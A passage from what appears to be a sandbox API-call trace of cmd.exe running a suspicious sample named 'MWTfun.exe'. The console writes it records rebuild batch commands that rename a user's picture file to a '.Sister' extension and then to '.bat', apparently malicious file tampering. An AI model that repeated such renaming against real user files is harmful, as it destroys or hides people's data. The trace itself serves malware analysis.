lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0293.911] ??_V@YAXPEAX@Z () returned 0x1 [0293.911] GetProcessHeap () returned 0x21ed8c70000 [0293.911] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d56920 [0293.912] GetProcessHeap () returned 0x21ed8c70000 [0293.912] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0293.912] GetProcessHeap () returned 0x21ed8c70000 [0293.912] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed8d56a60 [0293.912] GetProcessHeap () returned 0x21ed8c70000 [0293.912] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56a60) returned 0x130 [0293.912] malloc (_Size=0xffce) returned 0x21ed991f940 [0293.912] ??_V@YAXPEAX@Z () returned 0x21ed991f940 [0293.912] GetProcessHeap () returned 0x21ed8c70000 [0293.912] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7600 [0293.912] GetProcessHeap () returned 0x21ed8c70000 [0293.912] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93052b0 [0293.912] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.912] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.912] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.913] GetLastError () returned 0x2 [0293.913] GetProcessHeap () returned 0x21ed8c70000 [0293.913] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9347830 [0293.913] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9347840 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.913] SetErrorMode (uMode=0x0) returned 0x0 [0293.913] SetErrorMode (uMode=0x1) returned 0x0 [0293.913] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed991f940, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0293.913] SetErrorMode (uMode=0x0) returned 0x1 [0293.913] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0293.913] GetProcessHeap () returned 0x21ed8c70000 [0293.913] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9303a50 [0293.913] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.913] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.914] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.914] GetLastError () returned 0x2 [0293.914] ??_V@YAXPEAX@Z () returned 0x1 [0293.914] malloc (_Size=0xffce) returned 0x21ed991f940 [0293.914] ??_V@YAXPEAX@Z () returned 0x21ed991f940 [0293.914] malloc (_Size=0xffce) returned 0x21ed992f920 [0293.914] ??_V@YAXPEAX@Z () returned 0x21ed992f920 [0293.914] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.914] GetLastError () returned 0x2 [0293.914] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.914] GetFileType (hFile=0x54) returned 0x2 [0293.914] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0293.914] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0293.921] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.921] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0293.922] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.922] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.922] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0293.926] longjmp () [0293.926] ??_V@YAXPEAX@Z () returned 0x1 [0293.926] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Saved Pictures", cAlternateFileName="")) returned 1 [0293.926] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fef870, ftCreationTime.dwHighDateTime=0x1d5e455, ftLastAccessTime.dwLowDateTime=0xb6eff3a0, ftLastAccessTime.dwHighDateTime=0x1d5f0c5, ftLastWriteTime.dwLowDateTime=0xb6eff3a0, ftLastWriteTime.dwHighDateTime=0x1d5f0c5, nFileSizeHigh=0x0, nFileSizeLow=0x10023, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="tust f-S-Eq-29XvQ_R.png", cAlternateFileName="")) returned 1 [0293.926] GetProcessHeap () returned 0x21ed8c70000 [0293.926] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72790, Size=0x1d2) returned 0x21ed8c75940 [0293.927] GetProcessHeap () returned 0x21ed8c70000 [0293.927] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75940) returned 0x1d2 [0293.927] GetProcessHeap () returned 0x21ed8c70000 [0293.927] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9357820 [0293.927] GetProcessHeap () returned 0x21ed8c70000 [0293.927] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9357820, Size=0x30) returned 0x21ed9357820 [0293.927] GetProcessHeap () returned 0x21ed8c70000 [0293.927] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9357820) returned 0x30 [0293.927] GetProcessHeap () returned 0x21ed8c70000 [0293.927] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9357860 [0293.928] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0293.928] GetProcessHeap () returned 0x21ed8c70000 [0293.928] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7c0c0 [0293.928] ??_V@YAXPEAX@Z () returned 0x1 [0293.928] GetProcessHeap () returned 0x21ed8c70000 [0293.928] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9357860, Size=0x1f0) returned 0x21ed9357860 [0293.928] GetProcessHeap () returned 0x21ed8c70000 [0293.928] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9357860) returned 0x1f0 [0293.928] GetProcessHeap () returned 0x21ed8c70000 [0293.929] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9357a60 [0293.929] GetProcessHeap () returned 0x21ed8c70000 [0293.929] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9357a60, Size=0x290) returned 0x21ed9357a60 [0293.929] GetProcessHeap () returned 0x21ed8c70000 [0293.929] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9357a60) returned 0x290 [0293.929] GetProcessHeap () returned 0x21ed8c70000 [0293.929] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9357d00 [0293.929] GetProcessHeap () returned 0x21ed8c70000 [0293.929] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9357d00, Size=0x30) returned 0x21ed9357d00 [0293.929] GetProcessHeap () returned 0x21ed8c70000 [0293.929] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9357d00) returned 0x30 [0293.929] GetProcessHeap () returned 0x21ed8c70000 [0293.929] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9357d40 [0293.929] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0293.929] GetProcessHeap () returned 0x21ed8c70000 [0293.929] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bf30 [0293.929] ??_V@YAXPEAX@Z () returned 0x1 [0293.929] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0293.929] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x1d, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc84a0 [0293.930] FindClose (in: hFindFile=0x21ed8cc84a0 | out: hFindFile=0x21ed8cc84a0) returned 1 [0293.930] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x1d, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc84a0 [0293.930] FindClose (in: hFindFile=0x21ed8cc84a0 | out: hFindFile=0x21ed8cc84a0) returned 1 [0293.930] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd9c5ef6b, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd9c5ef6b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x1d, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8cc7d20 [0293.930] FindClose (in: hFindFile=0x21ed8cc7d20 | out: hFindFile=0x21ed8cc7d20) returned 1 [0293.933] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\tust f-S-Eq-29XvQ_R.png", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fef870, ftCreationTime.dwHighDateTime=0x1d5e455, ftLastAccessTime.dwLowDateTime=0xb6eff3a0, ftLastAccessTime.dwHighDateTime=0x1d5f0c5, ftLastWriteTime.dwLowDateTime=0xb6eff3a0, ftLastWriteTime.dwHighDateTime=0x1d5f0c5, nFileSizeHigh=0x0, nFileSizeLow=0x10023, dwReserved0=0x4, dwReserved1=0x1d, cFileName="tust f-S-Eq-29XvQ_R.png", cAlternateFileName="TUSTF-~1.PNG")) returned 0x21ed8cc8020 [0293.933] FindClose (in: hFindFile=0x21ed8cc8020 | out: hFindFile=0x21ed8cc8020) returned 1 [0293.933] _wcsnicmp (_String1="TUSTF-~1.PNG", _String2="tust f-S-Eq-29XvQ_R.png", _MaxCount=0x17) returned 70 [0293.933] malloc (_Size=0x1ff9c) returned 0x21eda0c0080 [0293.934] ??_V@YAXPEAX@Z () returned 0x21eda0c0080 [0293.935] GetProcessHeap () returned 0x21ed8c70000 [0293.935] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8710 [0293.935] ??_V@YAXPEAX@Z () returned 0x1 [0293.935] ??_V@YAXPEAX@Z () returned 0x1 [0293.936] GetProcessHeap () returned 0x21ed8c70000 [0293.936] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9357d40, Size=0x1f0) returned 0x21ed9357d40 [0293.936] GetProcessHeap () returned 0x21ed8c70000 [0293.936] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9357d40) returned 0x1f0 [0293.936] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0293.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.936] GetFileType (hFile=0x50) returned 0x2 [0293.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.936] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0293.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.936] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0293.942] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.942] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.943] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0293.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.943] GetFileType (hFile=0x50) returned 0x2 [0293.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.943] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0293.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.943] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0293.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.944] GetFileType (hFile=0x50) returned 0x2 [0293.944] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.944] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.944] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9357830*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9357830*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.945] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"tust f-S-Eq-29XvQ_R.png\" \"tust f-S-Eq-29XvQ_R.png.Sister\" ") returned 60 [0293.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.945] GetFileType (hFile=0x50) returned 0x2 [0293.945] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.945] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.945] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3c) returned 1 [0293.946] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0293.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.946] GetFileType (hFile=0x50) returned 0x2 [0293.946] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.946] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.946] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.946] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0293.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.946] GetFileType (hFile=0x50) returned 0x2 [0293.946] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.947] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.947] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0293.947] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0293.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.947] GetFileType (hFile=0x50) returned 0x2 [0293.947] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.948] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.948] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0293.948] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0293.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.948] GetFileType (hFile=0x50) returned 0x2 [0293.948] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.948] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.952] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0293.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.957] GetFileType (hFile=0x50) returned 0x2 [0293.957] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.957] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.958] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9357d10*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9357d10*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.958] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"tust f-S-Eq-29XvQ_R.png.Sister\" \"tust f-S-Eq-29XvQ_R.bat\" ") returned 60 [0293.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.958] GetFileType (hFile=0x50) returned 0x2 [0293.958] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.958] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.959] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3c) returned 1 [0293.964] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0293.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.964] GetFileType (hFile=0x50) returned 0x2 [0293.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.964] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0293.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.965] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0293.969] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.969] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.969] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.969] malloc (_Size=0xffce) returned 0x21eda0c0080 [0293.969] ??_V@YAXPEAX@Z () returned 0x21eda0c0080 [0293.969] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.969] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.969] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.969] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.969] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.969] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.969] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.969] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.969] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.969] ??_V@YAXPEAX@Z () returned 0x1 [0293.970] GetProcessHeap () returned 0x21ed8c70000 [0293.970] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed8c72790 [0293.970] GetProcessHeap () returned 0x21ed8c70000 [0293.970] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72790, Size=0x88) returned 0x21ed8c72790 [0293.970] GetProcessHeap () returned 0x21ed8c70000 [0293.970] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72790) returned 0x88 [0293.970] GetProcessHeap () returned 0x21ed8c70000 [0293.970] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d65cf0 [0293.970] GetProcessHeap () returned 0x21ed8c70000 [0293.970] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed8c72830 [0293.970] GetProcessHeap () returned 0x21ed8c70000 [0293.970] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72830, Size=0x88) returned 0x21ed8c72830 [0293.970] GetProcessHeap () returned 0x21ed8c70000 [0293.970] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72830) returned 0x88 [0293.970] malloc (_Size=0xffce) returned 0x21eda0c0080 [0293.970] ??_V@YAXPEAX@Z () returned 0x21eda0c0080 [0293.970] GetProcessHeap () returned 0x21ed8c70000 [0293.970] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7c00 [0293.970] GetProcessHeap () returned 0x21ed8c70000 [0293.970] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9302e20 [0293.970] _wcsicmp (_String1="tust f-S-Eq-29XvQ_R.png", _String2=".") returned 70 [0293.971] _wcsicmp (_String1="tust f-S-Eq-29XvQ_R.png", _String2="..") returned 70 [0293.971] GetFileAttributesW (lpFileName="tust f-S-Eq-29XvQ_R.png" (normalized: "c:\\users\\fd1hvy\\pictures\\tust f-s-eq-29xvq_r.png")) returned 0x20 [0293.971] GetProcessHeap () returned 0x21ed8c70000 [0293.971] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9357f40 [0293.972] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9357f50 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.972] SetErrorMode (uMode=0x0) returned 0x0 [0293.972] SetErrorMode (uMode=0x1) returned 0x0 [0293.972] GetFullPathNameW (in: lpFileName="tust f-S-Eq-29XvQ_R.png", nBufferLength=0x7fe7, lpBuffer=0x21eda0c0080, lpFilePart=0xa6cf4fd660 | out: 